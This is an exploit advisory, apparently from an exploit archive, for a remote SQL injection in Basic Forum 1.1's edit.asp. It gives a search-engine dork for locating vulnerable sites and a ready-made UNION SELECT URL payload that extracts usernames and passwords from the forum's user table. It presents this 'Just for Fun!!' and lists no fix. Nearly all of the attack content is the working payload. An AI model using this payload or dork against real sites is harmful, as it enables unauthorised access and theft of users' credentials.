Basic Forum <= 1.1 (edit.asp) Remote SQL Injection Vulnerability

2006-11-25 00:00:00

# Title : basicforum v 1.1 (edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "This script created by www.script.canavari.com"

---------------------------------------------------------------------------

http://[target]/[path]/edit.asp?type=message&id=-1+union+select+kullanici,sifre+from+uyeler

---------------------------------------------------------------------------
# Just for Fun!!

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.